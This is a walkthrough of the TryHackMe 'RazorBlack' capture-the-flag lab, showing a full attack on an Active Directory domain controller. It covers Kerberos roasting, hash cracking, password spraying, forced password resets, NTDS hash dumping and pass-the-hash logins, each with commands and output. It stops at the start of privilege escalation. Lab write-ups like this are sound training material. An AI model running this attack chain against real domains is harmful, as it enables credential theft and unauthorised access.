Post

TryHackMe - RazorBlack

Introduction

This is a TryHackMe room which can be found at: RazorBlack

These guys call themselves hackers. Can you show them who’s the boss ??

Reconnaissance & Scanning

Perform nmap scan to identify open ports and services.

  • Command: nmap -p- -T4 10.10.43.148
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
geobour98@kali:~$ nmap -p- -T4 10.10.43.148
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-13 19:00 EET                                                                                  
Nmap scan report for 10.10.43.148 (10.10.43.148)                                                                                               
Host is up (0.067s latency).                                                                                                                     
Not shown: 65506 closed tcp ports (conn-refused)                                                                                                 
PORT      STATE SERVICE                                                                                                                          
53/tcp    open  domain                                                                                                                           
88/tcp    open  kerberos-sec                                                                                                                     
111/tcp   open  rpcbind                                                                                                                          
135/tcp   open  msrpc                                                                                                                            
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49672/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49679/tcp open  unknown
49694/tcp open  unknown
49703/tcp open  unknown
49710/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 66.90 seconds

Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports.

  • Command: sudo nmap -A -sC -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,5985,9389,47001 10.10.43.148
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
geobour98@kali:~$ sudo nmap -A -sC -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,5985,9389,47001 10.10.43.148 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-13 19:04 EET                                                                                  
Nmap scan report for 10.10.43.148 (10.10.43.148)                                                                                               
Host is up (0.068s latency).                                                                                                                     
                                                                                                                                                 
PORT      STATE SERVICE       VERSION                                                                                                            
53/tcp    open  domain        Simple DNS Plus                                                                                                    
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-13 17:05:03Z)                                                     
111/tcp   open  rpcbind       2-4 (RPC #100000)                                                                                                  
| rpcinfo:                                                                                                                                       
|   program version    port/proto  service                                                                                                       
|   100000  2,3,4        111/tcp   rpcbind                                                                                                       
|   100000  2,3,4        111/tcp6  rpcbind                                                                                                       
|   100000  2,3,4        111/udp   rpcbind                                                                                                       
|   100000  2,3,4        111/udp6  rpcbind                                                                                                       
|   100003  2,3         2049/udp   nfs                                                                                                           
|   100003  2,3         2049/udp6  nfs                                                                                                           
|   100003  2,3,4       2049/tcp   nfs                                                                                                           
|   100003  2,3,4       2049/tcp6  nfs                                                                                                           
|   100005  1,2,3       2049/tcp   mountd                                                                                                        
|   100005  1,2,3       2049/tcp6  mountd                                                                                                        
|   100005  1,2,3       2049/udp   mountd                                                                                                        
|   100005  1,2,3       2049/udp6  mountd                                                                                                        
|   100021  1,2,3,4     2049/tcp   nlockmgr                                                                                                      
|   100021  1,2,3,4     2049/tcp6  nlockmgr                                                                                                      
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr                                                                                                      
|   100024  1           2049/tcp   status                                                                                                        
|   100024  1           2049/tcp6  status                                                                                                        
|   100024  1           2049/udp   status                                                                                                        
|_  100024  1           2049/udp6  status                                                                                                        
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                              
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                      
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  mountd        1-3 (RPC #100005)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RAZ0RBLACK
|   NetBIOS_Domain_Name: RAZ0RBLACK
|   NetBIOS_Computer_Name: HAVEN-DC
|   DNS_Domain_Name: raz0rblack.thm
|   DNS_Computer_Name: HAVEN-DC.raz0rblack.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-13T17:05:50+00:00
|_ssl-date: 2022-11-13T17:05:59+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm
| Not valid before: 2022-11-12T16:58:09
|_Not valid after:  2023-05-14T16:58:09
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                      
|_http-title: Not Found                                                                                                                          
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                               
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 1909 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows 

Host script results:
| smb2-time: 
|   date: 2022-11-13T17:05:54
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   69.73 ms 10.8.0.1 (10.8.0.1)
2   69.72 ms 10.10.43.148 (10.10.43.148)

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   69.73 ms 10.8.0.1 (10.8.0.1)
2   69.72 ms 10.10.43.148 (10.10.43.148)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.03 seconds

We notice that the Domain is: raz0rblack.thm and the Computer name is: HAVEN-DC.raz0rblack.thm.

We can add this domain and its IP in the /etc/hosts file.

Exploitation

We start by enumerating the NFS Service on port 2049, in order to identify any available folders to mount.

  • Command: showmount -e 10.10.43.148
1
2
3
geobour98@kali:~$ showmount -e 10.10.43.148
Export list for 10.10.43.148:
/users (everyone)

We can mount the /users folder in /mnt/raz0rblack, after creating that folder.

  • Command: sudo mount -t nfs 10.10.43.148:/users /mnt/raz0rblack
1
2
3
4
5
geobour98@kali:~$ sudo mkdir /mnt/raz0rblack
geobour98@kali:~$ sudo mount -t nfs 10.10.43.148:/users /mnt/raz0rblack
geobour98@kali:~$ sudo cat /mnt/raz0rblack/sbradley.txt
[REDACTED]
geobour98@kali:~$ sudo libreoffice /mnt/raz0rblack/employee_status.xlsx

We first found the Steven's flag from /mnt/raz0rblack/sbradley.txt. Also, we can guess from sbradley.txt that the username format is first letter from first name concatenated with last name (e.x steven bradley -> sbradley).

By opening the /mnt/raz0rblack/employee_status.xlsx with libreoffice, we find a list of first and last names.

  • Command: libreoffice employee-status.xlsx
1
2
3
4
5
6
7
8
9
10
11
12
daven port
imogen royce
tamara vidal
arthur edwards
carl ingram
nolan cassidy
reza zaydan
ljudmila vetrova
rico delgado
tyson williams
steven bradley
chamber lin

Now we can create a wordlist of usernames in the username format found. It should look like this:

1
2
3
4
5
6
7
8
9
10
11
12
dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin

We can use this wordlist (usernames.txt) in order to perform ASREPRoasting attack, which is used to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will then be encrypted with the user’s password, which can then be cracked offline.

That’s why we will use the script GetNPUsers.py from impacket.

  • Command: /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -usersfile usernames.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -usersfile usernames.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:b06cf7e41f643f8b3125503cfe1da6f0$5b13a70865c099fb16a7205ad2baf0acdef3467ce49313f512e14594dd4b6cab244fb6b37827dc8a098bf782885da1dbfed88623ca32e03a74b64775b6c0b20995c2ef6aeb16673e47625cfc331d08a20bd9e5ea8e6ff4b4ed6e36a46331e077eafd1e2dc97e18d6f553462f244e31083786f3a15d5427b4168e86c1cb6376bbbeeff64352082c0f2b00f5dfe0162e8d422e09dee2da12fdf9422a8c74c8185c752c181d79c24f091de9aeab5865cff73d7d2c03e3f6983f7473b0c028ddbff2bf0eb3f4d8a902273a8d38c4fc0e4aa42ed96abbdf07a4c58cb4ecbfbcd7b916a9340ea6b38f8ef086f61bf386b37c55
[-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

We found the hash for the user twilliams, which we put in a file and crack it with hashcat on mode 18200.

  • Command: hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
1
2
3
4
geobour98@kali:~$ hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
<snip>
$krb5asrep$23$twilliams@RAZ0RBLACK.THM:b06cf7e41f643f8b3125503cfe1da6f0$5b13a70865c099fb16a7205ad2baf0acdef3467ce49313f512e14594dd4b6cab244fb6b37827dc8a098bf782885da1dbfed88623ca32e03a74b64775b6c0b20995c2ef6aeb16673e47625cfc331d08a20bd9e5ea8e6ff4b4ed6e36a46331e077eafd1e2dc97e18d6f553462f244e31083786f3a15d5427b4168e86c1cb6376bbbeeff64352082c0f2b00f5dfe0162e8d422e09dee2da12fdf9422a8c74c8185c752c181d79c24f091de9aeab5865cff73d7d2c03e3f6983f7473b0c028ddbff2bf0eb3f4d8a902273a8d38c4fc0e4aa42ed96abbdf07a4c58cb4ecbfbcd7b916a9340ea6b38f8ef086f61bf386b37c55:roastpotatoes
<snip>

So, the cleartext password for twilliams is roastpotatoes.

Now, we can perform the Kerberoasting attack, which attempts to fetch Service Principal Names that are associated with normal user accounts. A ticket that is encrypted with the user account’s password is returned, which can then be bruteforced offline.

  • Command: /opt/impacket/examples/GetUserSPNs.py raz0rblack.thm/twilliams:'roastpotatoes' -request
1
2
3
4
5
6
7
8
9
10
11
geobour98@kali:~$ /opt/impacket/examples/GetUserSPNs.py raz0rblack.thm/twilliams:'roastpotatoes' -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName                   Name     MemberOf                                                    PasswordLastSet             LastLogon  Delegation 
-------------------------------------  -------  ----------------------------------------------------------  --------------------------  ---------  ----------
HAVEN-DC/xyan1d3.raz0rblack.thm:60111  xyan1d3  CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm  2021-02-23 17:17:17.715160  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*xyan1d3$RAZ0RBLACK.THM$raz0rblack.thm/xyan1d3*$3ca38240ade1692b388a4bc390cae312$0373c43411844cc70a8ae3a2590c26437aaff5ecb3c41f9c8b1ae0382c6da4753b01d9a515166ee58b34c72ca9bc74a393383fe31753619e80ae354bc4f89153cccba98c2ba0e0f8b4dc34ef7121ab40136461fc68c1ca17d2e60b83d89abcf6276391bbc7a2567a696f25354aaf0e8921db7f8f178bd38fdaf8ac1c4e6810c6f34a835ef4df865308c21b9425b8373e7569fc4efac5b7de00ae1ab769f975dc9b1ce4c58d4d48a591c7d065a4daf62f1842f4d649c3ebc1ceb9a066f03abd11c0833f78713e17a91205843486ef32ced30bcc296a471bd433c705c9a1b4bd7c944e0510f2ac7ee503d1ad95ff4487be4679e76789d5a3e09464342a0530e453aaf6147802c88a124c4617636d6f44222baa13fbdc32f3b00d31d02a42408468603f36d5c2059dfd34d58e50dc245f6f2a6036b66f144cd1927550beba20d6f2e486bf7f3d4e559d5d00218c7dc9a117ac884cd775850bfd539e1529e0837f1f5e68436cbce0de0fb3e1ca0fe720713605cb6142e60f3ad609bb68497f85b9d4b826200ec9287ed135e42d5f93af7dfa5e6f95afac4cda3742fd3e155e47f8d45143974240a181de24fe565196756a2dbbe66da4e1ccebea5af684512dd04b9bce9c501364e3f39ed585ae35d7f85fba466e6a6fb0214285e83244898a272979d1b685b89d59c6bdb0a7f98a079f1367df28415c5436d2436e5b050a4916f2eddf2954760902bee150ab6a8edb3876f1067d1eebcb3dbdb4621791143a4429d3267f36b57e22bb9966dc943e943963a85f2f570d00d2370245db817d9f3d1099fed9e71a49b3c6f5d1d7c2dbbe33f2ebdff00898064ca2776a0175e7749307d079fd1d4b25bde2d0921d15cbfb10a1781f21ea62748ebae5d14cac0cd2c80bea1ae483e53de85947d4621edf249739cf5935e52f63481e9e11822e08389f75dc3a31f5781b8bbab9cebfb4d04e819a133878d15633f7cea8e80f25d9cad0cad34827fcc3172155d7e04b59b243b4c631781468adfe081da1130435e1a1c3ed06ddacb001a29cf19f2cce09f0786e04fbaec392554a19adcd6838c329d957e5e660121f7acc07742491318b6e74b83861fa192aeac5a9c41c86021d83997016f318340efceffc33e50282d62cce352aff6e0f1c89e73fdc2450618d30c7f02954fad1321003b8117beb3153264d057b43dc52092fc5bcda4d074399705e0f3c53832e9afbd3464645ccdf54c23daa6a2e1b9658845be09666d85ec9f2943fc860d6bce32ed0f2e30faeee2dd26c9ed9a883658d29cc9b5ec55f6abb55c7241ce08281fad87492192555a2a8c2483cfb51845a5dd407cca4f5f8e5008b4bc0de16ae477b46213be0220922d892d2a11fc828a5c78609db87d4ac6919c7478deb134028c35ac061589738c22dedbca6b3ce

We found the hash for the user xyan1d3, which we can put in a file and crack it with hashcat on mode 13100.

  • Command: hashcat -m 13100 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt
1
2
3
4
geobour98@kali:~$ hashcat -m 13100 -a 0 hash1.txt /usr/share/wordlists/rockyou.txt
<snip>
$krb5tgs$23$*xyan1d3$RAZ0RBLACK.THM$raz0rblack.thm/xyan1d3*$3ca38240ade1692b388a4bc390cae312$0373c43411844cc70a8ae3a2590c26437aaff5ecb3c41f9c8b1ae0382c6da4753b01d9a515166ee58b34c72ca9bc74a393383fe31753619e80ae354bc4f89153cccba98c2ba0e0f8b4dc34ef7121ab40136461fc68c1ca17d2e60b83d89abcf6276391bbc7a2567a696f25354aaf0e8921db7f8f178bd38fdaf8ac1c4e6810c6f34a835ef4df865308c21b9425b8373e7569fc4efac5b7de00ae1ab769f975dc9b1ce4c58d4d48a591c7d065a4daf62f1842f4d649c3ebc1ceb9a066f03abd11c0833f78713e17a91205843486ef32ced30bcc296a471bd433c705c9a1b4bd7c944e0510f2ac7ee503d1ad95ff4487be4679e76789d5a3e09464342a0530e453aaf6147802c88a124c4617636d6f44222baa13fbdc32f3b00d31d02a42408468603f36d5c2059dfd34d58e50dc245f6f2a6036b66f144cd1927550beba20d6f2e486bf7f3d4e559d5d00218c7dc9a117ac884cd775850bfd539e1529e0837f1f5e68436cbce0de0fb3e1ca0fe720713605cb6142e60f3ad609bb68497f85b9d4b826200ec9287ed135e42d5f93af7dfa5e6f95afac4cda3742fd3e155e47f8d45143974240a181de24fe565196756a2dbbe66da4e1ccebea5af684512dd04b9bce9c501364e3f39ed585ae35d7f85fba466e6a6fb0214285e83244898a272979d1b685b89d59c6bdb0a7f98a079f1367df28415c5436d2436e5b050a4916f2eddf2954760902bee150ab6a8edb3876f1067d1eebcb3dbdb4621791143a4429d3267f36b57e22bb9966dc943e943963a85f2f570d00d2370245db817d9f3d1099fed9e71a49b3c6f5d1d7c2dbbe33f2ebdff00898064ca2776a0175e7749307d079fd1d4b25bde2d0921d15cbfb10a1781f21ea62748ebae5d14cac0cd2c80bea1ae483e53de85947d4621edf249739cf5935e52f63481e9e11822e08389f75dc3a31f5781b8bbab9cebfb4d04e819a133878d15633f7cea8e80f25d9cad0cad34827fcc3172155d7e04b59b243b4c631781468adfe081da1130435e1a1c3ed06ddacb001a29cf19f2cce09f0786e04fbaec392554a19adcd6838c329d957e5e660121f7acc07742491318b6e74b83861fa192aeac5a9c41c86021d83997016f318340efceffc33e50282d62cce352aff6e0f1c89e73fdc2450618d30c7f02954fad1321003b8117beb3153264d057b43dc52092fc5bcda4d074399705e0f3c53832e9afbd3464645ccdf54c23daa6a2e1b9658845be09666d85ec9f2943fc860d6bce32ed0f2e30faeee2dd26c9ed9a883658d29cc9b5ec55f6abb55c7241ce08281fad87492192555a2a8c2483cfb51845a5dd407cca4f5f8e5008b4bc0de16ae477b46213be0220922d892d2a11fc828a5c78609db87d4ac6919c7478deb134028c35ac061589738c22dedbca6b3ce:cyanide9amine5628
<snip>

So, the cleartext password for xyan1d3 is cyanide9amine5628.

We can login as xyan1d3 using evil-winrm. In order to find the xyan1d3's flag we need to retrieve (decrypt) some secret data from PowerShell. We can find the commands here: How To Save and Read Sensitive Data with PowerShell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u xyan1d3 -p cyanide9amine5628                                                                                   
                                                                                                                                                 
Evil-WinRM shell v3.4                                                                                                                            
                                                                                                                                                 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine          

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> cd ..
*Evil-WinRM* PS C:\Users\xyan1d3> dir
<snip>
-a----        2/25/2021   9:33 AM           1826 xyan1d3.xml
<snip>
*Evil-WinRM* PS C:\Users\xyan1d3> $credential = Import-CliXml -Path xyan1d3.xml
*Evil-WinRM* PS C:\Users\xyan1d3> $credential.GetNetworkCredential().Password
LOL here it is -> [REDACTED]

Now we can use crackmapexec on SMB in order to identify if any user has access to any share. Before doing this we create a file with the found passwords so far (passwords.txt), which should look like this:

1
2
roastpotatoes
cyanide9amine5628
  • Command: crackmapexec smb 10.10.43.148 -u usernames.txt -p passwords.txt --continue-on-success
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
geobour98@kali:~$ crackmapexec smb 10.10.136.136 -u usernames.txt -p passwords.txt --continue-on-success
SMB         10.10.43.148    445    HAVEN-DC         [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False)
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\dport:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\dport:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\iroyce:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\iroyce:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\tvidal:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\tvidal:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\aedwards:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\aedwards:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\cingram:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\cingram:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\ncassidy:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:roastpotatoes STATUS_LOGON_FAILURE
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rzaydan:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\lvetrova:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rdelgado:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\rdelgado:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [+] raz0rblack.thm\twilliams:roastpotatoes 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\twilliams:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\sbradley:cyanide9amine5628 STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\clin:roastpotatoes STATUS_LOGON_FAILURE 
SMB         10.10.43.148    445    HAVEN-DC         [-] raz0rblack.thm\clin:cyanide9amine5628 STATUS_LOGON_FAILURE

The most interesting finding is: raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE, which means that we are able to change the password of the user sbradley from roastpotatoes to whatever we want. We could do this with smbpasswd but didn’t work for me, so i used smbpasswd.py from impacket.

  • Command: sudo python3 /opt/impacket/examples/smbpasswd.py sbradley:roastpotatoes@10.10.43.148 -newpass password
1
2
3
4
5
geobour98@kali:~$ sudo python3 /opt/impacket/examples/smbpasswd.py sbradley:roastpotatoes@10.10.43.148 -newpass password
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

Now we can login to SMB using the credentials sbradley:password.

  • Command: smbmap -H 10.10.43.148 -u sbradley -p password
1
2
3
4
5
6
7
8
9
10
geobour98@kali:~$ smbmap -H 10.10.43.148 -u sbradley -p password
[+] IP: 10.10.43.148:445        Name: 10.10.43.148                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        trash                                                   READ ONLY       Files Pending for deletion

We notice that the user sbradley has READ access to the trash share. We download all the files in that share.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
geobour98@kali:~$ smbclient \\\\10.10.43.148\\trash -U sbradley
Password for [WORKGROUP\sbradley]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Mar 16 08:01:28 2021
  ..                                  D        0  Tue Mar 16 08:01:28 2021
  chat_log_20210222143423.txt         A     1340  Thu Feb 25 21:29:05 2021
  experiment_gone_wrong.zip           A 18927164  Tue Mar 16 08:02:20 2021
  sbradley.txt                        A       37  Sat Feb 27 21:24:21 2021

                5101823 blocks of size 4096. 950782 blocks available
smb: \> prompt off
smb: \> mget *
getting file \chat_log_20210222143423.txt of size 1340 as chat_log_20210222143423.txt (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \experiment_gone_wrong.zip of size 18927164 as experiment_gone_wrong.zip (1573.3 KiloBytes/sec) (average 1479.9 KiloBytes/sec)
getting file \sbradley.txt of size 37 as sbradley.txt (0.1 KiloBytes/sec) (average 1429.9 KiloBytes/sec)

The zip file (experiment_gone_wrong.zip) has a password, so we can generate a hash of the file using zip2john and crack it with john.

1
2
3
4
5
6
7
8
9
10
geobour98@kali:~$ zip2john experiment_gone_wrong.zip > experiment.hash
geobour98@kali:~$ john -w=/usr/share/wordlists/rockyou.txt experiment.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
electromagnetismo (experiment_gone_wrong.zip)     
1g 0:00:00:10 DONE (2022-11-14 23:28) 0.09532g/s 799676p/s 799676c/s 799676C/s elliotfrost..ejsa457
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we can unzip the file and see it’s contents using the password electromagnetismo.

1
2
3
4
5
geobour98@kali:~$ unzip experiment_gone_wrong.zip 
Archive:  experiment_gone_wrong.zip
[experiment_gone_wrong.zip] system.hive password: 
  inflating: system.hive             
  inflating: ntds.dit

Having found the files system.hive and ntds.dit we can use the script secretsdump.py from impacket in order to extract all the NT hashes. We will add the -just-dc-ntlm flag to return only the NTLM hashes. Also, we will execute some linux commands to generate a wordlist of NTLM hashes in the correct form.

  • Command: sudo /opt/impacket/examples/secretsdump.py -system system.hive -ntds ntds.dit LOCAL -just-dc-ntlm | cut -d ":" -f 4 | grep -wE '^.{32}' > hashes.txt
1
2
3
4
5
6
7
8
9
10
11
12
geobour98@kali:~$ sudo /opt/impacket/examples/secretsdump.py -system system.hive -ntds ntds.dit LOCAL -just-dc-ntlm | cut -d ":" -f 4 | grep -wE '^.{32}' > hashes.txt
geobour98@kali:~$ head -n 10 hashes.txt
1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
703a365974d7c3eeb80e11dd27fb0cb3
da3542420eff7cfab8305a68b7da7043
c378739d7c136c1281d06183665702ea
9f73aaafc3b6d62acdbb0b426f302f9e
6a5bad944868142e65ad3049a393e587
b112332330f11267486d21549d326bd5
f9b8c9864aa7bc53405ed45b48ef19ef

The first 10 lines of the file hashes.txt should look like above.

Now we can run crackmapexec to see if we can login via winrm with another user using their hash.

  • Command: crackmapexec winrm 10.10.43.148 -u usernames.txt -H hashes.txt
1
2
3
4
geobour98@kali:~$ crackmapexec winrm 10.10.43.148 -u usernames.txt -H hashes.txt
<snip>
WINRM       10.10.43.148     5985   HAVEN-DC         [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d (Pwn3d!)
<snip>

So, the ljudmila's hash (ljudmila vetrova) is f220d3988deb3f516c73f40ee16c431d and we can use evil-winrm to login as lvetrova. We need to follow the same process we did for xyan1d3 in order to view the flag.

  • Command: evil-winrm -i 10.10.43.148 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
geobour98@kali:~$ evil-winrm -i 10.10.43.148 -u lvetrova -H f220d3988deb3f516c73f40ee16c431d

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\lvetrova\Documents> cd ../
*Evil-WinRM* PS C:\Users\lvetrova> $credential = Import-CliXml -Path lvetrova.xml
*Evil-WinRM* PS C:\Users\lvetrova> $credential.GetNetworkCredential().Password
[REDACTED]
*Evil-WinRM* PS C:\Users\lvetrova>

Privilege Escalation

We go back and login with evil-winrm as the user xyan1d3. Then, we run whoami /priv to identify the security privileges of this user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
